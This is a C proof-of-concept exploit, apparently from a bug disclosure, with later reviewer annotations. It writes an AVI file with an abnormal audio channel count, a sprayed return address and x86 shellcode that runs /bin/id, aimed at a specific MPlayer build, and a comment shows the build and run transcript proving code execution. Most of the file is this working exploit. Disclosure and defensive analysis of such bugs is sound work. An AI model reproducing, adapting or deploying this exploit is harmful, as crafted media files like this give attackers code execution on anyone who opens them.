/*
 * NOTE(review): the names of the first three headers were lost when this page
 * was extracted (only the bare directives survive). The code below calls
 * fprintf, malloc, memset and memcpy, so standard headers declaring those
 * were presumably listed here -- confirm against the original attachment.
 */
#include
#include
#include
#include "avilib.h"

/*
 * quick mplayer poc for bug #103555, avilib comes from transcode.
 *
 * $ tar -zxvf /usr/portage/distfiles/transcode-0.6.14.tar.gz
 * $ cd transcode-0.6.14/avilib/
 * $ gcc /path/to/poc.c avilib.c -I. -I../libxio -o exploit
 * $ ./exploit
 * info: exploit.avi has been created.
 * $ mplayer exploit.avi
 * $ mplayer -vo sdl -really-quiet exploit.avi
 * MPlayer 1.0pre6-3.3.5-20050130 (C) 2000-2004 MPlayer Team
 * CPU: Intel Pentium 4/Xeon/Celeron Foster (Family: 8, Stepping: 9)
 * Detected cache-line size is 64 bytes
 * MMX2 supported but disabled
 * CPUflags: MMX: 1 MMX2: 0 3DNow: 0 3DNow2: 0 SSE: 1 SSE2: 1
 * Compiled for x86 CPU with extensions: MMX SSE SSE2
 *
 * 73 audio & 180 video codecs
 * SDL: Using driver: x11
 * SDL: deactivating XScreensaver/DPMS
 * SDL: X11 Resolution 1280x1024
 * SDL: Using 0x32315659 (Planar YV12) image format
 * SDL: using hardware-surface
 * uid=1000(taviso) gid=100(users) groups=10(wheel),100(users),250(portage)
 *
 * notice crazy number of channels in audio attributes.
 *
 * -taviso@gentoo.org
 */

/*
 * Reviewer summary (defensive reading of this listing).
 *
 * The program uses avilib to write one AVI file, OUTPUT_FILE, containing an
 * audio stream whose declared channel count is 65025, 64 audio chunks filled
 * with a repeated 32-bit value, and a single video frame. The transcript
 * above ends with the output of /bin/id, i.e. the payload ran with the
 * privileges of the user who opened the file in the player.
 *
 * The player-side flaw is not shown on this page. NOTE(review): what a parser
 * author should take from it is that stream parameters read from a container
 * header (here the audio channel count) must be range-checked before they
 * size or index any buffer; an audio stream declaring tens of thousands of
 * channels is also an anomaly that file-inspection tooling can flag.
 */

/* media-video/mplayer-1.0_pre6-r4 on kernel 2.6.7 */
/*
 * Hard-coded 32-bit value that is repeated through the audio data. The
 * comment above ties it to one specific package build and kernel, so the
 * listing is specific to that environment.
 */
#define RET_ADDR 0x874ada8
/* Name of the AVI file this program creates in the current directory. */
#define OUTPUT_FILE "exploit.avi"
/* Size in bytes of the single video frame written below. */
#define VBUF_SIZE 8192

/* execve() /bin/id */
/*
 * Declared as a string literal, so sizeof (shellcode) also counts the
 * terminating NUL byte; main() uses that sizeof for both the copy length and
 * the placement offset.
 */
unsigned char shellcode[] =
    "\x33\xc9\x83\xe9\xf5\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x7e"
    "\x02\xad\x8e\x83\xeb\xfc\xe2\xf4\x14\x09\xf5\x17\x2c\x64\xc5\xa3"
    "\x1d\x8b\x4a\xe6\x51\x71\xc5\x8e\x16\x2d\xcf\xe7\x10\x8b\x4e\xdc"
    "\x96\x0a\xad\x8e\x7e\x2d\xcf\xe7\x10\x2d\xc4\xea\x7e\x55\xfe\x07"
    "\x9f\xcf\x2d\x8e";

/*
 * Builds OUTPUT_FILE and prints a one-line confirmation on stdout.
 *
 * argc and argv are not used. Always returns 0: none of the avilib calls or
 * the malloc result is checked, so a failure to create the file or to
 * allocate the frame buffer is not reported.
 */
int main(int argc, char **argv)
{
    unsigned char abuf[8192], *vbuf;
    avi_t *avifile;
    int i, *p;

    /* open output file */
    /* NOTE(review): return value is used below without a NULL check. */
    avifile = AVI_open_output_file(OUTPUT_FILE);

    /* set attributes */
    /*
     * Video: presumably width 156, height 88, 10.0 fps, compressor "cvid" --
     * confirm the parameter order against avilib.h.
     * Audio: 65025 is the channel count the header comment calls out as the
     * abnormal value; the remaining arguments are presumably rate, bits per
     * sample, format tag and MP3 bitrate -- confirm against avilib.h.
     */
    AVI_set_video(avifile, 156, 88, 10.0, "cvid");
    AVI_set_audio(avifile, 65025, 11025, 8, 1, 0);

    /* prepare and write audio buffer */
    /*
     * Stores RET_ADDR repeatedly into abuf, starting at byte offset 3 and
     * advancing by sizeof (int) each step, stopping sizeof (void *) bytes
     * short of the last element. abuf[0..2] and the bytes after the final
     * store are never written, so the file carries indeterminate stack
     * contents in those positions.
     * NOTE(review): the store goes through a misaligned int pointer obtained
     * by a cast, which ISO C leaves undefined, and the loop bound subtracts
     * from a void pointer, which is a GNU extension.
     */
    for (p = (int *)(abuf + 3);
         (void *)p <= (void *)&abuf[sizeof (abuf) - 1] - sizeof (void *);
         p++)
        *p = RET_ADDR;

    /* The same buffer is written 64 times: 64 * 8192 = 524288 bytes of audio. */
    for (i = 0; i < 64; i++)
        AVI_write_audio(avifile, abuf, sizeof (abuf));

    /* prepare and write video buffer */
    /*
     * The frame is VBUF_SIZE bytes of 0x90 with the shellcode array copied
     * into its last sizeof (shellcode) bytes, written as a single frame.
     * The final argument 0 is presumably the keyframe flag -- confirm
     * against avilib.h.
     * NOTE(review): the malloc result is not checked before memset, and
     * vbuf is never freed (the process exits right after).
     */
    vbuf = (unsigned char *) malloc (VBUF_SIZE);
    memset(vbuf, 0x90, VBUF_SIZE);
    memcpy(vbuf + VBUF_SIZE - sizeof (shellcode), shellcode, sizeof (shellcode));
    AVI_write_frame(avifile, vbuf, VBUF_SIZE, 0);

    /* write avi header */
    AVI_close(avifile);

    /* Printed unconditionally, even if an earlier call failed. */
    fprintf(stdout, "info: %s has been created.\n", OUTPUT_FILE);

    return 0;
}